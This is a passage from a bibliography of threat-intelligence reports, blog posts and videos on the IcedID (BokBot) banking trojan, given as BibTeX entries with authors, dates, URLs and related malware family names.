@online{kasmani:20210529:analysis:96b0902, author = {AhmedS Kasmani}, title = {{Analysis of ICEID Malware Installer DLL}}, date = {2021-05-29}, organization = {Youtube (AhmedS Kasmani)}, url = {https://www.youtube.com/watch?v=wMXD4Sv1Alw}, language = {English}, urldate = {2021-06-04} } Analysis of ICEID Malware Installer DLL
IcedID
2021-05-26Check PointAlex Ilgayev
@online{ilgayev:20210526:melting:40f5caf, author = {Alex Ilgayev}, title = {{Melting Ice – Tracking IcedID Servers with a few simple steps}}, date = {2021-05-26}, organization = {Check Point}, url = {https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/}, language = {English}, urldate = {2021-06-09} } Melting Ice – Tracking IcedID Servers with a few simple steps
IcedID
2021-05-19Team CymruJosh Hopkins, Andy Kraus, Nick Byers
@online{hopkins:20210519:tracking:45749be, author = {Josh Hopkins and Andy Kraus and Nick Byers}, title = {{Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network}}, date = {2021-05-19}, organization = {Team Cymru}, url = {https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/}, language = {English}, urldate = {2021-05-26} } Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network
IcedID
2021-05-18RECON INFOSECAndrew Cook
@online{cook:20210518:encounter:c4ef6d9, author = {Andrew Cook}, title = {{An Encounter With TA551/Shathak}}, date = {2021-05-18}, organization = {RECON INFOSEC}, url = {https://blog.reconinfosec.com/an-encounter-with-ta551-shathak}, language = {English}, urldate = {2021-05-25} } An Encounter With TA551/Shathak
IcedID
2021-05-17TelekomThomas Barabosch
@online{barabosch:20210517:lets:04a8b63, author = {Thomas Barabosch}, title = {{Let’s set ice on fire: Hunting and detecting IcedID infections}}, date = {2021-05-17}, organization = {Telekom}, url = {https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240}, language = {English}, urldate = {2021-05-17} } Let’s set ice on fire: Hunting and detecting IcedID infections
IcedID
2021-05-17Github (telekom-security)Deutsche Telekom Security GmbH
@online{gmbh:20210517:icedidanalysis:e985983, author = {Deutsche Telekom Security GmbH}, title = {{icedid_analysis}}, date = {2021-05-17}, organization = {Github (telekom-security)}, url = {https://github.com/telekom-security/icedid_analysis}, language = {English}, urldate = {2021-05-17} } icedid_analysis
IcedID
2021-05-12The DFIR Report
@online{report:20210512:conti:598c5f2, author = {The DFIR Report}, title = {{Conti Ransomware}}, date = {2021-05-12}, url = {https://thedfirreport.com/2021/05/12/conti-ransomware/}, language = {English}, urldate = {2021-05-13} } Conti Ransomware
Cobalt Strike Conti IcedID
2021-05-10MALWATIONmalwation
@online{malwation:20210510:icedid:0637539, author = {malwation}, title = {{IcedID Malware Technical Analysis Report}}, date = {2021-05-10}, organization = {MALWATION}, url = {https://malwation.com/icedid-malware-technical-analysis-report/}, language = {English}, urldate = {2021-07-02} } IcedID Malware Technical Analysis Report
IcedID
2021-04-19NetresecErik Hjelmvik
@online{hjelmvik:20210419:analysing:c6bff49, author = {Erik Hjelmvik}, title = {{Analysing a malware PCAP with IcedID and Cobalt Strike traffic}}, date = {2021-04-19}, organization = {Netresec}, url = {https://netresec.com/?b=214d7ff}, language = {English}, urldate = {2021-04-20} } Analysing a malware PCAP with IcedID and Cobalt Strike traffic
Cobalt Strike IcedID
2021-04-17YouTube (Worcester DEFCON Group)Joel Snape, Nettitude
@online{snape:20210417:inside:2c3ae5c, author = {Joel Snape and Nettitude}, title = {{Inside IcedID: Anatomy Of An Infostealer}}, date = {2021-04-17}, organization = {YouTube (Worcester DEFCON Group)}, url = {https://www.youtube.com/watch?v=YEqLIR6hfOM}, language = {English}, urldate = {2021-04-20} } Inside IcedID: Anatomy Of An Infostealer
IcedID
2021-04-12Trend MicroRaphael Centeno, Don Ovid Ladores, Lala Manly, Junestherry Salvador, Frankylnn Uy
@online{centeno:20210412:spike:d67dcb0, author = {Raphael Centeno and Don Ovid Ladores and Lala Manly and Junestherry Salvador and Frankylnn Uy}, title = {{A Spike in BazarCall and IcedID Activity Detected in March}}, date = {2021-04-12}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html}, language = {English}, urldate = {2021-04-14} } A Spike in BazarCall and IcedID Activity Detected in March
BazarBackdoor IcedID
2021-04-114rchibld4rchibld
@online{4rchibld:20210411:icedid:4135c21, author = {4rchibld}, title = {{IcedID on my neck I’m the coolest}}, date = {2021-04-11}, organization = {4rchibld}, url = {https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/}, language = {English}, urldate = {2021-05-11} } IcedID on my neck I’m the coolest
IcedID
2021-04-10Youtube (AhmedS Kasmani)AhmedS Kasmani
@online{kasmani:20210410:malware:e2000de, author = {AhmedS Kasmani}, title = {{Malware Analysis: IcedID Banking Trojan JavaScript Dropper}}, date = {2021-04-10}, organization = {Youtube (AhmedS Kasmani)}, url = {https://www.youtube.com/watch?v=oZ4bwnjcXWg}, language = {English}, urldate = {2021-04-12} } Malware Analysis: IcedID Banking Trojan JavaScript Dropper
IcedID
2021-04-09 | Microsoft | Emily Hacker, Justin Carroll, Microsoft 365 Defender Threat Intelligence Team
@online{hacker:20210409:investigating:2b6f30a, author = {Emily Hacker and Justin Carroll and Microsoft 365 Defender Threat Intelligence Team}, title = {{Investigating a unique “form” of email delivery for IcedID malware}}, date = {2021-04-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/}, language = {English}, urldate = {2021-04-12} } Investigating a unique “form” of email delivery for IcedID malware
IcedID
2021-04-09 | aaqeel01 | Ali Aqeel
@online{aqeel:20210409:icedid:a6e3243, author = {Ali Aqeel}, title = {{IcedID Analysis}}, date = {2021-04-09}, organization = {aaqeel01}, url = {https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/}, language = {English}, urldate = {2021-04-12} } IcedID Analysis
IcedID
2021-04-07 | Minerva | Minerva Labs
@online{labs:20210407:icedid:d178d16, author = {Minerva Labs}, title = {{IcedID - A New Threat In Office Attachments}}, date = {2021-04-07}, organization = {Minerva}, url = {https://blog.minerva-labs.com/icedid-maas}, language = {English}, urldate = {2021-04-09} } IcedID - A New Threat In Office Attachments
IcedID
2021-04-07 | Uptycs | Ashwin Vamshi, Abhijit Mohanta
@online{vamshi:20210407:icedid:bbda303, author = {Ashwin Vamshi and Abhijit Mohanta}, title = {{IcedID campaign spotted being spiced with Excel 4 Macros}}, date = {2021-04-07}, organization = {Uptycs}, url = {https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros}, language = {English}, urldate = {2021-04-09} } IcedID campaign spotted being spiced with Excel 4 Macros
IcedID
2021-04-01 | Reversing Labs | Robert Simmons
@online{simmons:20210401:code:885c081, author = {Robert Simmons}, title = {{Code Reuse Across Packers and DLL Loaders}}, date = {2021-04-01}, organization = {Reversing Labs}, url = {https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders}, language = {English}, urldate = {2021-04-09} } Code Reuse Across Packers and DLL Loaders
IcedID SystemBC
2021-03-31 | Red Canary | Red Canary
@techreport{canary:20210331:2021:cd81f2d, author = {Red Canary}, title = {{2021 Threat Detection Report}}, date = {2021-03-31}, institution = {Red Canary}, url = {https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf}, language = {English}, urldate = {2021-04-06} } 2021 Threat Detection Report
Shlayer Andromeda Cobalt Strike Dridex Emotet IcedID MimiKatz QakBot TrickBot
2021-03-29 | The DFIR Report | The DFIR Report
@online{report:20210329:sodinokibi:4c63e20, author = {The DFIR Report}, title = {{Sodinokibi (aka REvil) Ransomware}}, date = {2021-03-29}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/}, language = {English}, urldate = {2021-03-30} } Sodinokibi (aka REvil) Ransomware
Cobalt Strike IcedID REvil
2021-03-12 | Binary Defense | James Quinn
@online{quinn:20210312:icedid:3e6db43, author = {James Quinn}, title = {{IcedID GZIPLOADER Analysis}}, date = {2021-03-12}, organization = {Binary Defense}, url = {https://www.binarydefense.com/icedid-gziploader-analysis/}, language = {English}, urldate = {2021-03-16} } IcedID GZIPLOADER Analysis
IcedID
2021-03-04 | F5 | Dor Nizar, Roy Moshailov
@online{nizar:20210304:icedid:bfcc689, author = {Dor Nizar and Roy Moshailov}, title = {{IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims}}, date = {2021-03-04}, organization = {F5}, url = {https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims}, language = {English}, urldate = {2021-03-06} } IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims
IcedID
2021-03 | Group-IB | Oleg Skulkin, Roman Rezvukhin, Semyon Rogachev
@techreport{skulkin:202103:ransomware:992ca10, author = {Oleg Skulkin and Roman Rezvukhin and Semyon Rogachev}, title = {{Ransomware Uncovered 2020/2021}}, date = {2021-03}, institution = {Group-IB}, url = {https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf}, language = {English}, urldate = {2021-06-16} } Ransomware Uncovered 2020/2021
RansomEXX BazarBackdoor Buer Clop Conti DoppelPaymer Dridex Egregor IcedID Maze PwndLocker QakBot RansomEXX REvil Ryuk SDBbot TrickBot Zloader
2021-02-26 | CrowdStrike | Eric Loui, Sergei Frankoff
@online{loui:20210226:hypervisor:8dadf9c, author = {Eric Loui and Sergei Frankoff}, title = {{Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact}}, date = {2021-02-26}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout}, language = {English}, urldate = {2021-05-26} } Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact
DarkSide RansomEXX Griffon Carbanak Cobalt Strike DarkSide IcedID MimiKatz PyXie RansomEXX REvil
2021-02-25 | FireEye | Bryce Abdo, Brendan McKeague, Van Ta
@online{abdo:20210225:so:88f3400, author = {Bryce Abdo and Brendan McKeague and Van Ta}, title = {{So Unchill: Melting UNC2198 ICEDID to Ransomware Operations}}, date = {2021-02-25}, organization = {FireEye}, url = {https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html}, language = {English}, urldate = {2021-03-02} } So Unchill: Melting UNC2198 ICEDID to Ransomware Operations
MOUSEISLAND Cobalt Strike Egregor IcedID Maze SystemBC
2021-02-23 | CrowdStrike | CrowdStrike
@techreport{crowdstrike:20210223:2021:bf5bc4f, author = {CrowdStrike}, title = {{2021 Global Threat Report}}, date = {2021-02-23}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf}, language = {English}, urldate = {2021-02-25} } 2021 Global Threat Report
RansomEXX Amadey Anchor Avaddon BazarBackdoor Clop Cobalt Strike Conti Cutwail DanaBot DarkSide DoppelPaymer Dridex Egregor Emotet Hakbit IcedID JSOutProx KerrDown LockBit Mailto Maze MedusaLocker Mespinoza Mount Locker NedDnLoader Nemty Pay2Key PlugX Pushdo PwndLocker PyXie QakBot Quasar RAT RagnarLocker Ragnarok RansomEXX REvil Ryuk Sekhmet ShadowPad SmokeLoader Snake SUNBURST SunCrypt TEARDROP TrickBot WastedLocker Winnti Zloader KNOCKOUT SPIDER OUTLAW SPIDER RIDDLE SPIDER SOLAR SPIDER VIKING SPIDER
2021-02-03 | Mimecast, Nettitude
@techreport{mimecast:20210203:ta551shathak:4bd9a01, author = {Mimecast and Nettitude}, title = {{TA551/Shathak Threat Research}}, date = {2021-02-03}, institution = {}, url = {https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf}, language = {English}, urldate = {2021-05-26} } TA551/Shathak Threat Research
IcedID
2021-02-02 | CRONUP | Germán Fernández
@online{fernndez:20210202:de:6ff4f3a, author = {Germán Fernández}, title = {{De ataque con Malware a incidente de Ransomware}}, date = {2021-02-02}, organization = {CRONUP}, url = {https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware}, language = {Spanish}, urldate = {2021-03-02} } De ataque con Malware a incidente de Ransomware
Avaddon BazarBackdoor Buer Clop Cobalt Strike Conti DanaBot Dharma Dridex Egregor Emotet Empire Downloader FriedEx GootKit IcedID MegaCortex Nemty Phorpiex PwndLocker PyXie QakBot RansomEXX REvil Ryuk SDBbot SmokeLoader TrickBot Zloader
2021-01-19 | Medium elis531989 | Eli Salem
@online{salem:20210119:funtastic:42f9250, author = {Eli Salem}, title = {{Funtastic Packers And Where To Find Them}}, date = {2021-01-19}, organization = {Medium elis531989}, url = {https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7}, language = {English}, urldate = {2021-01-21} } Funtastic Packers And Where To Find Them
Get2 IcedID QakBot
2021-01-19 | Palo Alto Networks Unit 42 | Brad Duncan
@online{duncan:20210119:wireshark:be0c831, author = {Brad Duncan}, title = {{Wireshark Tutorial: Examining Emotet Infection Traffic}}, date = {2021-01-19}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/}, language = {English}, urldate = {2021-01-21} } Wireshark Tutorial: Examining Emotet Infection Traffic
Emotet GootKit IcedID QakBot TrickBot
2021-01-18 | tccontre Blog | tcontre
@online{tcontre:20210118:extracting:4935b1c, author = {tcontre}, title = {{Extracting Shellcode in ICEID .PNG Steganography}}, date = {2021-01-18}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2021/01/}, language = {English}, urldate = {2021-01-21} } Extracting Shellcode in ICEID .PNG Steganography
IcedID
2021-01-09 | Marco Ramilli's Blog | Marco Ramilli
@online{ramilli:20210109:command:d720b27, author = {Marco Ramilli}, title = {{Command and Control Traffic Patterns}}, date = {2021-01-09}, organization = {Marco Ramilli's Blog}, url = {https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/}, language = {English}, urldate = {2021-05-17} } Command and Control Traffic Patterns
ostap LaZagne Agent Tesla Azorult Buer Cobalt Strike DanaBot DarkComet Dridex Emotet Formbook IcedID ISFB NetWire RC PlugX Quasar RAT SmokeLoader TrickBot
2021-01-07 | Palo Alto Networks Unit 42 | Brad Duncan
@online{duncan:20210107:ta551:6346c62, author = {Brad Duncan}, title = {{TA551: Email Attack Campaign Switches from Valak to IcedID}}, date = {2021-01-07}, organization = {Palo Alto Networks Unit 42}, url = {https://unit42.paloaltonetworks.com/ta551-shathak-icedid/}, language = {English}, urldate = {2021-01-11} } TA551: Email Attack Campaign Switches from Valak to IcedID
IcedID
2020-12-10 | NRI SECURE | NeoSOC
@online{neosoc:20201210:icedid:b05d899, author = {NeoSOC}, title = {{マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説}}, date = {2020-12-10}, organization = {NRI SECURE}, url = {https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid}, language = {Japanese}, urldate = {2020-12-11} } マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説
IcedID
2020-12-09 | Cisco | David Liebenberg, Caitlin Huey
@online{liebenberg:20201209:quarterly:9ed3062, author = {David Liebenberg and Caitlin Huey}, title = {{Quarterly Report: Incident Response trends from Fall 2020}}, date = {2020-12-09}, organization = {Cisco}, url = {https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html}, language = {English}, urldate = {2020-12-10} } Quarterly Report: Incident Response trends from Fall 2020
Cobalt Strike IcedID Maze RansomEXX Ryuk
2020-12-09 | Microsoft | Microsoft 365 Defender Research Team
@online{team:20201209:edr:c8811f1, author = {Microsoft 365 Defender Research Team}, title = {{EDR in block mode stops IcedID cold}}, date = {2020-12-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/}, language = {English}, urldate = {2020-12-11} } EDR in block mode stops IcedID cold
IcedID
2020-12-02 | CyberInt | Cyberint Research
@online{research:20201202:icedid:d43e06d, author = {Cyberint Research}, title = {{IcedID Stealer Man-in-the-browser Banking Trojan}}, date = {2020-12-02}, organization = {CyberInt}, url = {https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan}, language = {English}, urldate = {2020-12-11} } IcedID Stealer Man-in-the-browser Banking Trojan
IcedID
2020-11-26 | Cybereason | Lior Rochberger, Cybereason Nocturnus
@online{rochberger:20201126:cybereason:8301aeb, author = {Lior Rochberger and Cybereason Nocturnus}, title = {{Cybereason vs. Egregor Ransomware}}, date = {2020-11-26}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware}, language = {English}, urldate = {2020-12-08} } Cybereason vs. Egregor Ransomware
Cobalt Strike Egregor IcedID ISFB QakBot
2020-09-29 | Microsoft | Microsoft
@techreport{microsoft:20200929:microsoft:6e5d7b0, author = {Microsoft}, title = {{Microsoft Digital Defense Report}}, date = {2020-09-29}, institution = {Microsoft}, url = {https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf}, language = {English}, urldate = {2020-10-05} } Microsoft Digital Defense Report
Emotet IcedID Mailto Maze QakBot REvil RobinHood TrickBot
2020-08-16 | kienmanowar Blog | m4n0w4r
@online{m4n0w4r:20200816:manual:7a970b8, author = {m4n0w4r}, title = {{Manual Unpacking IcedID Write-up}}, date = {2020-08-16}, organization = {kienmanowar Blog}, url = {https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/}, language = {English}, urldate = {2020-08-20} } Manual Unpacking IcedID Write-up
IcedID
2020-08-12 | Juniper | Paul Kimayong
@online{kimayong:20200812:icedid:b40f8b4, author = {Paul Kimayong}, title = {{IcedID Campaign Strikes Back}}, date = {2020-08-12}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back}, language = {English}, urldate = {2020-08-27} } IcedID Campaign Strikes Back
IcedID
2020-08-10 | tccontre Blog | tccontre
@online{tccontre:20200810:learning:8cc052c, author = {tccontre}, title = {{Learning From ICEID loader - Including its Steganography Payload Parsing}}, date = {2020-08-10}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html}, language = {English}, urldate = {2020-08-14} } Learning From ICEID loader - Including its Steganography Payload Parsing
IcedID
2020-07-30 | Spamhaus | Spamhaus Malware Labs
@techreport{labs:20200730:spamhaus:038546d, author = {Spamhaus Malware Labs}, title = {{Spamhaus Botnet Threat Update Q2 2020}}, date = {2020-07-30}, institution = {Spamhaus}, url = {https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf}, language = {English}, urldate = {2020-07-30} } Spamhaus Botnet Threat Update Q2 2020
AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader
2020-07-01 | Cisco Talos | Nick Biasini, Edmund Brumaghin, Mariano Graziano
@online{biasini:20200701:threat:a726b7e, author = {Nick Biasini and Edmund Brumaghin and Mariano Graziano}, title = {{Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks}}, date = {2020-07-01}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2020/07/valak-emerges.html}, language = {English}, urldate = {2020-08-18} } Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks
Valak IcedID ISFB MyKings Spreader
2020-06-22 | zero2auto | Daniel Bunce
@online{bunce:20200622:unpacking:8a02d84, author = {Daniel Bunce}, title = {{Unpacking Visual Basic Packers – IcedID}}, date = {2020-06-22}, organization = {zero2auto}, url = {https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/}, language = {English}, urldate = {2020-06-24} } Unpacking Visual Basic Packers – IcedID
IcedID
2020-06-18 | Juniper | Paul Kimayong
@online{kimayong:20200618:covid19:4bb5511, author = {Paul Kimayong}, title = {{COVID-19 and FMLA Campaigns used to install new IcedID banking malware}}, date = {2020-06-18}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware}, language = {English}, urldate = {2020-06-23} } COVID-19 and FMLA Campaigns used to install new IcedID banking malware
IcedID
2020-06-17 | Github (f0wl) | Marius Genheimer
@online{genheimer:20200617:deicer:de78cca, author = {Marius Genheimer}, title = {{deICEr: A Go tool for extracting config from IcedID second stage Loaders}}, date = {2020-06-17}, organization = {Github (f0wl)}, url = {https://github.com/f0wl/deICEr}, language = {English}, urldate = {2020-06-18} } deICEr: A Go tool for extracting config from IcedID second stage Loaders
IcedID
2020-05-29 | Group-IB | Ivan Pisarev
@online{pisarev:20200529:icedid:9627fda, author = {Ivan Pisarev}, title = {{IcedID: When ice burns through bank accounts}}, date = {2020-05-29}, organization = {Group-IB}, url = {https://www.group-ib.com/blog/icedid}, language = {English}, urldate = {2020-06-02} } IcedID: When ice burns through bank accounts
IcedID
2020-03-04 | CrowdStrike | CrowdStrike
@techreport{crowdstrike:20200304:2020:818c85f, author = {CrowdStrike}, title = {{2020 CrowdStrike Global Threat Report}}, date = {2020-03-04}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf}, language = {English}, urldate = {2020-07-24} } 2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelDridex DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot Vidar Winnti ANTHROPOID SPIDER APT31 APT39 BlackTech BuhTrap Charming Kitten CLOCKWORK SPIDER DOPPEL SPIDER FIN7 Gamaredon Group Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER PINCHY SPIDER Pirate Panda SALTY SPIDER SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER VICEROY TIGER
2020-02-18 | Sophos Labs | Luca Nagy
@online{nagy:20200218:nearly:8ff363f, author = {Luca Nagy}, title = {{Nearly a quarter of malware now communicates using TLS}}, date = {2020-02-18}, organization = {Sophos Labs}, url = {https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/}, language = {English}, urldate = {2020-02-27} } Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot
2020-01-22 | Thomas Barabosch
@online{barabosch:20200122:malware:f805475, author = {Thomas Barabosch}, title = {{The malware analyst’s guide to PE timestamps}}, date = {2020-01-22}, url = {https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/}, language = {English}, urldate = {2021-01-25} } The malware analyst’s guide to PE timestamps
Azorult Gozi IcedID ISFB LOLSnif SUNBURST TEARDROP
2020 | Secureworks | SecureWorks
@online{secureworks:2020:gold:65fcc96, author = {SecureWorks}, title = {{GOLD SWATHMORE}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-swathmore}, language = {English}, urldate = {2020-05-23} } GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot LUNAR SPIDER
2019-12-18 | Github (psrok1) | Paweł Srokosz
@online{srokosz:20191218:icedid:05c3255, author = {Paweł Srokosz}, title = {{IcedID PNG Extractor}}, date = {2019-12-18}, organization = {Github (psrok1)}, url = {https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b}, language = {English}, urldate = {2020-01-13} } IcedID PNG Extractor
IcedID
2019-12-12 | FireEye | Chi-en Shen, Oleg Bondarenko
@online{shen:20191212:cyber:e01baca, author = {Chi-en Shen and Oleg Bondarenko}, title = {{Cyber Threat Landscape in Japan – Revealing Threat in the Shadow}}, date = {2019-12-12}, organization = {FireEye}, url = {https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko}, language = {English}, urldate = {2020-04-16} } Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech
2019-12-03 | Malwarebytes | Threat Intelligence Team
@online{team:20191203:new:39b59e1, author = {Threat Intelligence Team}, title = {{New version of IcedID Trojan uses steganographic payloads}}, date = {2019-12-03}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/}, language = {English}, urldate = {2019-12-24} } New version of IcedID Trojan uses steganographic payloads
IcedID
2019-07-09 | Fortinet | Kai Lu
@online{lu:20190709:deep:90d708f, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection}}, date = {2019-07-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html}, language = {English}, urldate = {2020-01-08} } A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID
2019-06-25 | Dawid Golak
@online{golak:20190625:icedid:0a3e153, author = {Dawid Golak}, title = {{IcedID aka #Bokbot Analysis with Ghidra}}, date = {2019-06-25}, url = {https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766}, language = {English}, urldate = {2019-12-02} } IcedID aka #Bokbot Analysis with Ghidra
IcedID
2019-06-16 | Fortinet | Kai Lu
@online{lu:20190616:deep:ba89738, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)}}, date = {2019-06-16}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html}, language = {English}, urldate = {2019-11-27} } A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID
2019-04-04 | SecurityIntelligence | Nir Somech, Limor Kessem
@online{somech:20190404:icedid:54ba40f, author = {Nir Somech and Limor Kessem}, title = {{IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth}}, date = {2019-04-04}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/}, language = {English}, urldate = {2020-01-08} } IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID
2019-03-21 | CrowdStrike | Shaun Hurley, James Scalise
@online{hurley:20190321:interception:7e57329, author = {Shaun Hurley and James Scalise}, title = {{Interception: Dissecting BokBot’s “Man in the Browser”}}, date = {2019-03-21}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/}, language = {English}, urldate = {2019-12-20} } Interception: Dissecting BokBot’s “Man in the Browser”
IcedID
2019-02-15 | CrowdStrike | Brendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak LUNAR SPIDER WIZARD SPIDER
2019-02-06 | SecurityIntelligence | Itzik Chimino, Limor Kessem, Ophir Harpaz
@online{chimino:20190206:icedid:ef0caad, author = {Itzik Chimino and Limor Kessem and Ophir Harpaz}, title = {{IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites}}, date = {2019-02-06}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/}, language = {English}, urldate = {2020-01-08} } IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID
2019-01-03 | CrowdStrike | Shaun Hurley, James Scalise
@online{hurley:20190103:digging:5219f6d, author = {Shaun Hurley and James Scalise}, title = {{Digging into BokBot’s Core Module}}, date = {2019-01-03}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/}, language = {English}, urldate = {2019-12-20} } Digging into BokBot’s Core Module
IcedID
2018-11-09 | Youtube (OALabs) | Sean Wilson, Sergei Frankoff
@online{wilson:20181109:reverse:7e90205, author = {Sean Wilson and Sergei Frankoff}, title = {{Reverse Engineering IcedID / Bokbot Malware Part 2}}, date = {2018-11-09}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=7Dk7NkIbVqY}, language = {English}, urldate = {2019-07-09} } Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID
2018-10-26 | Youtube (OALabs) | Sergei Frankoff
